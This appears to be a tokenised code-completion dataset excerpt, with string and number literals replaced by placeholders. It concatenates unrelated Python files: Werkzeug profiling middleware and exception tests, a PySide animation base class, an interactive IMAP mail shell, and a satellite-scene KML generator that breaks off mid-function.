<EOL> self . _restrictions = restrictions <EOL> self . _profile_dir = profile_dir <EOL> def __call__ ( self , environ , start_response ) : <EOL> response_body = [ ] <EOL> def catching_start_response ( status , headers , exc_info = None ) : <EOL> start_response ( status , headers , exc_info ) <EOL> return response_body . append <EOL> def runapp ( ) : <EOL> appiter = self . _app ( environ , catching_start_response ) <EOL> response_body . extend ( appiter ) <EOL> if hasattr ( appiter , '<STR_LIT>' ) : <EOL> appiter . close ( ) <EOL> p = Profile ( ) <EOL> start = time . time ( ) <EOL> p . runcall ( runapp ) <EOL> body = b'<STR_LIT>' . join ( response_body ) <EOL> elapsed = time . time ( ) - start <EOL> if self . _profile_dir is not None : <EOL> prof_filename = os . path . join ( self . _profile_dir , <EOL> '<STR_LIT>' % ( <EOL> environ [ '<STR_LIT>' ] , <EOL> environ . get ( '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) . 
replace ( '<STR_LIT:/>' , '<STR_LIT:.>' ) or '<STR_LIT:root>' , <EOL> elapsed * <NUM_LIT> , <EOL> time . time ( ) <EOL> ) ) <EOL> p . dump_stats ( prof_filename ) <EOL> else : <EOL> stats = Stats ( p , stream = self . _stream ) <EOL> stats . sort_stats ( * self . _sort_by ) <EOL> self . _stream . write ( '<STR_LIT:->' * <NUM_LIT> ) <EOL> self . _stream . write ( '<STR_LIT>' % environ . get ( '<STR_LIT>' ) ) <EOL> stats . print_stats ( * self . _restrictions ) <EOL> self . _stream . write ( '<STR_LIT:->' * <NUM_LIT> + '<STR_LIT>' ) <EOL> return [ body ] <EOL> def make_action ( app_factory , hostname = '<STR_LIT:localhost>' , port = <NUM_LIT> , <EOL> threaded = False , processes = <NUM_LIT:1> , stream = None , <EOL> sort_by = ( '<STR_LIT:time>' , '<STR_LIT>' ) , restrictions = ( ) ) : <EOL> """<STR_LIT>""" <EOL> def action ( hostname = ( '<STR_LIT:h>' , hostname ) , port = ( '<STR_LIT:p>' , port ) , <EOL> threaded = threaded , processes = processes ) : <EOL> """<STR_LIT>""" <EOL> from werkzeug . serving import run_simple <EOL> app = ProfilerMiddleware ( app_factory ( ) , stream , sort_by , restrictions ) <EOL> run_simple ( hostname , port , app , False , None , threaded , processes ) <EOL> return action </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from werkzeug . testsuite import WerkzeugTestCase <EOL> from werkzeug import exceptions <EOL> from werkzeug . wrappers import Response <EOL> from werkzeug . _compat import text_type <EOL> class ExceptionsTestCase ( WerkzeugTestCase ) : <EOL> def test_proxy_exception ( self ) : <EOL> orig_resp = Response ( '<STR_LIT>' ) <EOL> try : <EOL> exceptions . abort ( orig_resp ) <EOL> except exceptions . HTTPException as e : <EOL> resp = e . get_response ( { } ) <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . assert_true ( resp is orig_resp ) <EOL> self . assert_equal ( resp . get_data ( ) , b'<STR_LIT>' ) <EOL> def test_aborter ( self ) : <EOL> abort = exceptions . abort <EOL> self . assert_raises ( exceptions . BadRequest , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . Unauthorized , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . Forbidden , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . NotFound , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . MethodNotAllowed , abort , <NUM_LIT> , [ '<STR_LIT:GET>' , '<STR_LIT>' ] ) <EOL> self . assert_raises ( exceptions . NotAcceptable , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . RequestTimeout , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . Gone , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . LengthRequired , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . PreconditionFailed , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . RequestEntityTooLarge , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . RequestURITooLarge , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . UnsupportedMediaType , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . UnprocessableEntity , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . InternalServerError , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . 
NotImplemented , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . BadGateway , abort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . ServiceUnavailable , abort , <NUM_LIT> ) <EOL> myabort = exceptions . Aborter ( { <NUM_LIT:1> : exceptions . NotFound } ) <EOL> self . assert_raises ( LookupError , myabort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . NotFound , myabort , <NUM_LIT:1> ) <EOL> myabort = exceptions . Aborter ( extra = { <NUM_LIT:1> : exceptions . NotFound } ) <EOL> self . assert_raises ( exceptions . NotFound , myabort , <NUM_LIT> ) <EOL> self . assert_raises ( exceptions . NotFound , myabort , <NUM_LIT:1> ) <EOL> def test_exception_repr ( self ) : <EOL> exc = exceptions . NotFound ( ) <EOL> self . assert_equal ( text_type ( exc ) , '<STR_LIT>' ) <EOL> self . assert_equal ( repr ( exc ) , "<STR_LIT>" ) <EOL> exc = exceptions . NotFound ( '<STR_LIT>' ) <EOL> self . assert_equal ( text_type ( exc ) , '<STR_LIT>' ) <EOL> self . assert_equal ( repr ( exc ) , "<STR_LIT>" ) <EOL> def test_special_exceptions ( self ) : <EOL> exc = exceptions . MethodNotAllowed ( [ '<STR_LIT:GET>' , '<STR_LIT>' , '<STR_LIT:POST>' ] ) <EOL> h = dict ( exc . get_headers ( { } ) ) <EOL> self . assert_equal ( h [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assert_true ( '<STR_LIT>' in exc . get_description ( ) ) <EOL> def suite ( ) : <EOL> suite = unittest . TestSuite ( ) <EOL> suite . addTest ( unittest . makeSuite ( ExceptionsTestCase ) ) <EOL> return suite </s>
<s> fileName = '<STR_LIT>' <EOL> WRITE = '<STR_LIT:w>' <EOL> APPEND = '<STR_LIT:a>' <EOL> data = input ( '<STR_LIT>' ) <EOL> file = open ( fileName , mode = WRITE ) <EOL> file . write ( data ) <EOL> file . close ( ) <EOL> print ( '<STR_LIT>' ) </s>
<s> __author__ = "<STR_LIT>" <EOL> import abc <EOL> from threading import Thread <EOL> from PySide . QtCore import Signal , QObject , QPoint <EOL> class MAnimator ( QObject ) : <EOL> __metaclass__ = abc . ABCMeta <EOL> start_signal = Signal ( ) <EOL> pause_signal = Signal ( ) <EOL> end_signal = Signal ( ) <EOL> resume_signal = Signal ( ) <EOL> cancel_signal = Signal ( ) <EOL> def __init__ ( self ) : <EOL> QObject . __init__ ( self ) <EOL> self . __paused = False <EOL> self . __started = False <EOL> self . __running = False <EOL> self . __target = None <EOL> self . __can_run_reversed = False <EOL> self . __run_reversed = False <EOL> self . __cancel = False <EOL> self . __end = False <EOL> self . __start_delay = <NUM_LIT:0> <EOL> self . __duration = <NUM_LIT:1000> <EOL> self . __shapes = [ ] <EOL> self . __fps = <NUM_LIT> <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> self . started = True <EOL> t = Thread ( target = self . animate , args = ( self . __shapes , ) ) <EOL> t . start ( ) <EOL> @ abc . abstractmethod <EOL> def animate ( self , shape ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> self . canceled = True <EOL> def end ( self ) : <EOL> """<STR_LIT>""" <EOL> self . ended = True <EOL> def pause ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . running and not self . paused : <EOL> self . paused = True <EOL> def resume ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . __paused : <EOL> self . __paused = False <EOL> def add_target ( self , shape ) : <EOL> """<STR_LIT>""" <EOL> self . __shapes . append ( shape ) <EOL> def remove_target ( self , shape ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . __shapes . remove ( shape ) <EOL> return True <EOL> except ValueError : <EOL> return False <EOL> @ property <EOL> def started ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __started <EOL> @ started . setter <EOL> def started ( self , started ) : <EOL> self . 
__started = started <EOL> @ property <EOL> def canceled ( self ) : <EOL> return self . __cancel <EOL> @ canceled . setter <EOL> def canceled ( self , cancel ) : <EOL> self . __cancel = cancel <EOL> @ property <EOL> def ended ( self ) : <EOL> return self . __end <EOL> @ ended . setter <EOL> def ended ( self , end ) : <EOL> self . __end = end <EOL> @ property <EOL> def paused ( self ) : <EOL> return self . __paused <EOL> @ paused . setter <EOL> def paused ( self , paused ) : <EOL> self . __paused = paused <EOL> @ property <EOL> def duration ( self ) : <EOL> return self . __duration <EOL> @ duration . setter <EOL> def duration ( self , duration ) : <EOL> self . __duration = duration <EOL> @ property <EOL> def running ( self ) : <EOL> return self . __running <EOL> @ running . setter <EOL> def running ( self , is_it ) : <EOL> self . __running = is_it <EOL> @ property <EOL> def start_delay ( self ) : <EOL> return self . __start_delay <EOL> @ start_delay . setter <EOL> def start_delay ( self , delay ) : <EOL> self . __start_delay = delay / <NUM_LIT:1000> <EOL> @ property <EOL> def can_run_reversed ( self ) : <EOL> return self . __can_run_reversed <EOL> @ can_run_reversed . setter <EOL> def can_run_reversed ( self , can ) : <EOL> self . __can_run_reversed = can <EOL> @ property <EOL> def run_reversed ( self ) : <EOL> return self . __run_reversed <EOL> @ run_reversed . setter <EOL> def run_reversed ( self , run ) : <EOL> self . __run_reversed = run <EOL> @ property <EOL> def fps ( self ) : <EOL> return self . __fps <EOL> @ fps . setter <EOL> def fps ( self , fps ) : <EOL> self . __fps = fps <EOL> @ property <EOL> def target ( self ) : <EOL> return self . __target <EOL> @ target . setter <EOL> def target ( self , target ) : <EOL> self . __target = target </s>
<s> imports = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> buildcode = """<STR_LIT>""" <EOL> callcode = """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> import argparse <EOL> import cmd <EOL> import datetime <EOL> import logging <EOL> import os <EOL> import sys <EOL> import tempfile <EOL> import threading <EOL> import time <EOL> import webbrowser <EOL> import docopt <EOL> import imap_cli <EOL> from imap_cli import config <EOL> from imap_cli import const <EOL> from imap_cli import copy <EOL> from imap_cli import fetch <EOL> from imap_cli import flag <EOL> from imap_cli import search <EOL> app_name = os . path . splitext ( os . path . basename ( __file__ ) ) [ <NUM_LIT:0> ] <EOL> keep_alive_bool = True <EOL> keep_alive_timer = <NUM_LIT:30> <EOL> log = logging . getLogger ( app_name ) <EOL> class ImapShell ( cmd . Cmd ) : <EOL> completekey = '<STR_LIT>' <EOL> intro = u'<STR_LIT>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> prompt = '<STR_LIT>' <EOL> stdout = sys . stdout <EOL> cmdqueue = [ ] <EOL> delete_conf = None <EOL> def __init__ ( self , imap_account ) : <EOL> self . imap_account = imap_account <EOL> def do_cd ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> args = docopt . docopt ( '<STR_LIT>' , arg ) <EOL> except SystemExit : <EOL> return <EOL> cd_result = imap_cli . change_dir ( self . imap_account , <EOL> directory = args [ '<STR_LIT>' ] ) <EOL> if cd_result == - <NUM_LIT:1> : <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> else : <EOL> self . prompt = '<STR_LIT>' . format ( args [ '<STR_LIT>' ] ) <EOL> def do_cp ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> args = docopt . docopt ( '<STR_LIT>' , arg ) <EOL> except SystemExit : <EOL> return <EOL> copy . copy ( self . imap_account , args [ '<STR_LIT>' ] , args [ '<STR_LIT>' ] ) <EOL> def do_flag ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> args = docopt . docopt ( '<STR_LIT:\n>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , argv = arg ) <EOL> except SystemExit : <EOL> return <EOL> flag . flag ( self . 
imap_account , [ args [ '<STR_LIT>' ] ] , args [ '<STR_LIT>' ] , <EOL> unset = args [ '<STR_LIT>' ] ) <EOL> def do_list ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> args = docopt . docopt ( '<STR_LIT:\n>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , argv = arg ) <EOL> except SystemExit : <EOL> return <EOL> try : <EOL> limit = int ( args [ '<STR_LIT>' ] or <NUM_LIT:10> ) <EOL> except ValueError : <EOL> limit = <NUM_LIT:10> <EOL> for mail_info in search . fetch_mails_info ( self . imap_account , <EOL> limit = limit ) : <EOL> sys . stdout . write ( <EOL> u'<STR_LIT>' . format ( <EOL> mail_info [ '<STR_LIT>' ] , <EOL> mail_info [ '<STR_LIT>' ] , <EOL> mail_info [ '<STR_LIT>' ] ) ) <EOL> def do_mv ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> args = docopt . docopt ( '<STR_LIT>' , arg ) <EOL> except SystemExit : <EOL> return <EOL> copy . copy ( self . imap_account , args [ '<STR_LIT>' ] , args [ '<STR_LIT>' ] ) <EOL> flag . flag ( self . imap_account , args [ '<STR_LIT>' ] , [ const . FLAG_DELETED ] ) <EOL> self . imap_account . expunge ( ) <EOL> def do_quit ( self , arg ) : <EOL> '<STR_LIT>' <EOL> global keep_alive_bool <EOL> keep_alive_bool = False <EOL> imap_cli . disconnect ( self . imap_account ) <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> return True <EOL> def do_rm ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> args = docopt . docopt ( '<STR_LIT>' , arg ) <EOL> except SystemExit : <EOL> return <EOL> if self . delete_conf [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> copy . copy ( self . imap_account , args [ '<STR_LIT>' ] , <EOL> self . delete_conf [ '<STR_LIT>' ] ) <EOL> flag . flag ( self . imap_account , args [ '<STR_LIT>' ] , [ const . FLAG_DELETED ] ) <EOL> if self . delete_conf [ '<STR_LIT>' ] in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . imap_account . 
expunge ( ) <EOL> def do_read ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> args = docopt . docopt ( u'<STR_LIT:\n>' . join ( [ <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> ] ) , arg ) <EOL> except SystemExit : <EOL> return <EOL> fetched_mail = fetch . read ( self . imap_account , args [ '<STR_LIT>' ] , <EOL> save_directory = args [ '<STR_LIT>' ] ) <EOL> if fetched_mail is None : <EOL> log . error ( "<STR_LIT>" ) <EOL> if args [ '<STR_LIT>' ] is True : <EOL> temp_file = tempfile . NamedTemporaryFile ( delete = False ) <EOL> temp_file . write ( fetch . display ( fetched_mail , <EOL> browser = True ) . encode ( '<STR_LIT:utf-8>' ) ) <EOL> webbrowser . open_new_tab ( temp_file . name ) <EOL> temp_file . close ( ) <EOL> else : <EOL> sys . stdout . write ( fetch . display ( fetched_mail ) ) <EOL> def do_search ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> usage = '<STR_LIT:\n>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> try : <EOL> args = docopt . docopt ( usage , argv = arg ) <EOL> except SystemExit : <EOL> return <EOL> if args . get ( '<STR_LIT>' ) is not None : <EOL> args [ '<STR_LIT>' ] = args [ '<STR_LIT>' ] . split ( '<STR_LIT:U+002C>' ) <EOL> if args [ '<STR_LIT>' ] is not None : <EOL> try : <EOL> date = datetime . datetime . strptime ( args [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> except ValueError : <EOL> date = None <EOL> else : <EOL> date = None <EOL> search_criterion = search . create_search_criterion ( <EOL> address = args [ '<STR_LIT>' ] , <EOL> date = date , <EOL> subject = args [ '<STR_LIT>' ] , <EOL> size = args [ '<STR_LIT>' ] , <EOL> tags = args [ '<STR_LIT>' ] , <EOL> text = args [ '<STR_LIT>' ] , <EOL> ) <EOL> mail_set = search . fetch_uids ( self . 
imap_account , <EOL> search_criterion = search_criterion ) <EOL> if len ( mail_set ) == <NUM_LIT:0> : <EOL> log . error ( '<STR_LIT>' ) <EOL> return <NUM_LIT:0> <EOL> for mail_info in search . fetch_mails_info ( self . imap_account , <EOL> mail_set = mail_set ) : <EOL> sys . stdout . write ( <EOL> u'<STR_LIT>' . format ( <EOL> mail_info [ '<STR_LIT>' ] , <EOL> mail_info [ '<STR_LIT>' ] , <EOL> mail_info [ '<STR_LIT>' ] ) ) <EOL> def do_status ( self , arg ) : <EOL> '<STR_LIT>' <EOL> directory_statuses = sorted ( imap_cli . status ( self . imap_account ) , <EOL> key = lambda obj : obj [ '<STR_LIT>' ] ) <EOL> for directory_status in directory_statuses : <EOL> sys . stdout . write ( <EOL> u'<STR_LIT>' . format ( <EOL> directory_status [ '<STR_LIT>' ] , <EOL> directory_status [ '<STR_LIT>' ] , <EOL> directory_status [ '<STR_LIT>' ] , <EOL> directory_status [ '<STR_LIT:count>' ] ) ) <EOL> def do_unseen ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> search_criterion = search . create_search_criterion ( tags = [ '<STR_LIT>' ] ) <EOL> mail_set = search . fetch_uids ( self . imap_account , <EOL> search_criterion = search_criterion ) <EOL> if len ( mail_set ) == <NUM_LIT:0> : <EOL> log . error ( '<STR_LIT>' ) <EOL> else : <EOL> for mail_info in search . fetch_mails_info ( self . imap_account , <EOL> mail_set = mail_set ) : <EOL> sys . stdout . write ( <EOL> u'<STR_LIT>' . format ( <EOL> mail_info [ '<STR_LIT>' ] , <EOL> mail_info [ '<STR_LIT>' ] , <EOL> mail_info [ '<STR_LIT>' ] ) ) <EOL> def emptyline ( self ) : <EOL> pass <EOL> def keep_alive ( imap_account ) : <EOL> time_count = <NUM_LIT:0> <EOL> while keep_alive_bool is True : <EOL> time_count += <NUM_LIT:1> <EOL> if time_count % keep_alive_timer == <NUM_LIT:0> : <EOL> log . debug ( '<STR_LIT>' ) <EOL> imap_account . noop ( ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( description = __doc__ ) <EOL> parser . 
add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> logging . basicConfig ( <EOL> level = logging . DEBUG if args . verbose else logging . WARNING , <EOL> stream = sys . stdout , <EOL> ) <EOL> connection_config = config . new_context_from_file ( section = '<STR_LIT>' ) <EOL> if connection_config is None : <EOL> return <NUM_LIT:1> <EOL> delete_config = config . new_context_from_file ( section = '<STR_LIT>' ) <EOL> imap_account = imap_cli . connect ( ** connection_config ) <EOL> imap_shell = ImapShell ( imap_account ) <EOL> imap_shell . delete_conf = delete_config <EOL> keep_alive_thread = threading . Thread ( target = keep_alive , <EOL> args = ( imap_account , ) ) <EOL> keep_alive_thread . start ( ) <EOL> imap_shell . cmdloop ( ) <EOL> keep_alive_thread . join ( ) <EOL> return <NUM_LIT:0> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( ) ) </s>
<s> '''<STR_LIT>''' <EOL> import xml . dom . minidom <EOL> import argparse <EOL> from datetime import datetime <EOL> import logging , os , re , copy <EOL> from agdc import DataCube <EOL> from EOtools . utils import log_multiline <EOL> logger = logging . getLogger ( '<STR_LIT>' + __name__ ) <EOL> class SceneKMLGenerator ( DataCube ) : <EOL> '''<STR_LIT>''' <EOL> def parse_args ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( '<STR_LIT>' ) <EOL> _arg_parser = argparse . ArgumentParser ( '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> default = os . path . join ( self . agdc_root , '<STR_LIT>' ) , <EOL> help = '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> default = False , action = '<STR_LIT>' , const = True , <EOL> help = '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> required = False , default = <NUM_LIT:1> , <EOL> help = '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> required = False , default = None , <EOL> help = '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> required = False , default = None , <EOL> help = '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> required = False , default = None , <EOL> help = '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> required = False , default = <NUM_LIT> , <EOL> help = '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> required = False , default = None , <EOL> help = '<STR_LIT>' ) <EOL> return _arg_parser . parse_args ( ) <EOL> def getChildNodesByName ( self , node , nodeName ) : <EOL> return [ child_node for child_node in node . childNodes if child_node . 
nodeName == nodeName ] <EOL> def __init__ ( self , source_datacube = None , default_tile_type_id = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> if source_datacube : <EOL> self . __dict__ = copy ( source_datacube . __dict__ ) <EOL> args = self . parse_args ( ) <EOL> for attribute_name in args . __dict__ . keys ( ) : <EOL> attribute_value = args . __dict__ [ attribute_name ] <EOL> self . __setattr__ ( attribute_name , attribute_value ) <EOL> else : <EOL> DataCube . __init__ ( self ) <EOL> try : <EOL> self . start_date = datetime . strptime ( self . start_date , '<STR_LIT>' ) . date ( ) <EOL> except : <EOL> try : <EOL> self . start_date = datetime . strptime ( self . start_date , '<STR_LIT>' ) . date ( ) <EOL> except : <EOL> try : <EOL> self . start_date = datetime . strptime ( self . start_date , '<STR_LIT>' ) . date ( ) <EOL> except : <EOL> self . start_date = None <EOL> try : <EOL> self . end_date = datetime . strptime ( self . end_date , '<STR_LIT>' ) . date ( ) <EOL> except : <EOL> try : <EOL> self . end_date = datetime . strptime ( self . end_date , '<STR_LIT>' ) . date ( ) <EOL> except : <EOL> try : <EOL> self . end_date = datetime . strptime ( self . end_date , '<STR_LIT>' ) . date ( ) <EOL> except : <EOL> self . end_date = None <EOL> try : <EOL> self . thumbnail_size = int ( self . thumbnail_size ) <EOL> except : <EOL> self . thumbnail_size = <NUM_LIT> <EOL> try : <EOL> self . min_path = int ( self . min_path ) <EOL> except : <EOL> self . min_path = None <EOL> try : <EOL> self . max_path = int ( self . max_path ) <EOL> except : <EOL> self . max_path = None <EOL> try : <EOL> self . min_row = int ( self . min_row ) <EOL> except : <EOL> self . min_row = None <EOL> try : <EOL> self . max_row = int ( self . max_row ) <EOL> except : <EOL> self . max_row = None <EOL> self . 
style_dict = { <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:width>' : <NUM_LIT:2> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> } <EOL> def generate ( self , kml_filename = None , wrs_shapefile = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> def write_xml_file ( filename , dom_tree , save_backup = False ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( '<STR_LIT>' , filename ) <EOL> if save_backup and os . path . exists ( filename + '<STR_LIT>' ) : <EOL> os . remove ( filename + '<STR_LIT>' ) <EOL> if os . path . exists ( filename ) : <EOL> if save_backup : <EOL> os . rename ( filename , filename + '<STR_LIT>' ) <EOL> else : <EOL> os . remove ( filename ) <EOL> try : <EOL> outfile = open ( filename , '<STR_LIT:w>' ) <EOL> assert outfile is not None , '<STR_LIT>' + filename + '<STR_LIT>' <EOL> logger . debug ( '<STR_LIT>' , filename ) <EOL> outfile . write ( re . sub ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> re . sub ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> dom_tree . toprettyxml ( encoding = '<STR_LIT:utf-8>' ) <EOL> ) <EOL> ) <EOL> ) <EOL> finally : <EOL> outfile . close ( ) <EOL> def get_wrs_placemark_node ( wrs_document_node , placemark_name ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return [ placemark_node for placemark_node in self . getChildNodesByName ( wrs_document_node , '<STR_LIT>' ) <EOL> if self . getChildNodesByName ( placemark_node , '<STR_LIT:name>' ) [ <NUM_LIT:0> ] . childNodes [ <NUM_LIT:0> ] . nodeValue == placemark_name ] [ <NUM_LIT:0> ] . cloneNode ( True ) <EOL> except : <EOL> return None <EOL> def create_placemark_node ( wrs_document_node , acquisition_info ) : <EOL> """<STR_LIT>""" <EOL> logger . 
info ( '<STR_LIT>' , acquisition_info [ '<STR_LIT>' ] ) <EOL> wrs_placemark_name = '<STR_LIT>' % ( acquisition_info [ '<STR_LIT:path>' ] , acquisition_info [ '<STR_LIT>' ] ) <EOL> kml_placemark_name = acquisition_info [ '<STR_LIT>' ] <EOL> placemark_node = get_wrs_placemark_node ( wrs_document_node , wrs_placemark_name ) <EOL> self . getChildNodesByName ( placemark_node , '<STR_LIT:name>' ) [ <NUM_LIT:0> ] . childNodes [ <NUM_LIT:0> ] . nodeValue = kml_placemark_name <EOL> kml_time_span_node = kml_dom_tree . createElement ( '<STR_LIT>' ) <EOL> placemark_node . appendChild ( kml_time_span_node ) <EOL> kml_time_begin_node = kml_dom_tree . createElement ( '<STR_LIT>' ) <EOL> kml_time_begin_text_node = kml_dom_tree . createTextNode ( acquisition_info [ '<STR_LIT>' ] . isoformat ( ) ) <EOL> kml_time_begin_node . appendChild ( kml_time_begin_text_node ) <EOL> kml_time_span_node . appendChild ( kml_time_begin_node ) <EOL> kml_time_end_node = kml_dom_tree . createElement ( '<STR_LIT:end>' ) <EOL> kml_time_end_text_node = kml_dom_tree . createTextNode ( acquisition_info [ '<STR_LIT>' ] . isoformat ( ) ) <EOL> kml_time_end_node . appendChild ( kml_time_end_text_node ) <EOL> kml_time_span_node . appendChild ( kml_time_end_node ) <EOL> description_node = self . getChildNodesByName ( placemark_node , '<STR_LIT:description>' ) [ <NUM_LIT:0> ] <EOL> description_node . childNodes [ <NUM_LIT:0> ] . data = '''<STR_LIT>''' % acquisition_info <EOL> return placemark_node <EOL> kml_filename = kml_filename or self . output_file <EOL> assert kml_filename , '<STR_LIT>' <EOL> wrs_dom_tree = xml . dom . minidom . parse ( wrs_shapefile ) <EOL> wrs_document_element = wrs_dom_tree . documentElement <EOL> wrs_document_node = self . getChildNodesByName ( wrs_document_element , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> kml_dom_tree = xml . dom . minidom . getDOMImplementation ( ) . createDocument ( wrs_document_element . namespaceURI , <EOL> '<STR_LIT>' , <EOL> wrs_dom_tree . 
doctype ) <EOL> kml_document_element = kml_dom_tree . documentElement <EOL> for attribute_value in wrs_document_element . attributes . items ( ) : <EOL> kml_document_element . setAttribute ( attribute_value [ <NUM_LIT:0> ] , attribute_value [ <NUM_LIT:1> ] ) <EOL> kml_document_node = kml_dom_tree . createElement ( '<STR_LIT>' ) <EOL> kml_document_element . appendChild ( kml_document_node ) <EOL> for wrs_child_node in [ child_node for child_node in wrs_document_node . childNodes <EOL> if child_node . nodeName != '<STR_LIT>' ] : <EOL> kml_child_node = kml_dom_tree . importNode ( wrs_child_node , True ) <EOL> kml_document_node . appendChild ( kml_child_node ) <EOL> doc_name = '<STR_LIT>' <EOL> if self . satellite or self . sensor : <EOL> doc_name += '<STR_LIT>' <EOL> if self . satellite : <EOL> doc_name += '<STR_LIT>' % self . satellite <EOL> if self . sensor : <EOL> doc_name += '<STR_LIT>' % self . sensor <EOL> if self . start_date : <EOL> doc_name += '<STR_LIT>' % self . start_date <EOL> if self . end_date : <EOL> doc_name += '<STR_LIT>' % self . end_date <EOL> logger . debug ( '<STR_LIT>' , doc_name ) <EOL> self . getChildNodesByName ( kml_document_node , '<STR_LIT:name>' ) [ <NUM_LIT:0> ] . childNodes [ <NUM_LIT:0> ] . data = doc_name <EOL> for style_node in self . getChildNodesByName ( kml_document_node , '<STR_LIT>' ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for tag_name in self . style_dict . keys ( ) : <EOL> tag_nodes = self . getChildNodesByName ( style_node , tag_name ) <EOL> if tag_nodes : <EOL> logger . debug ( '<STR_LIT>' , tag_name ) <EOL> tag_node = tag_nodes [ <NUM_LIT:0> ] <EOL> else : <EOL> logger . 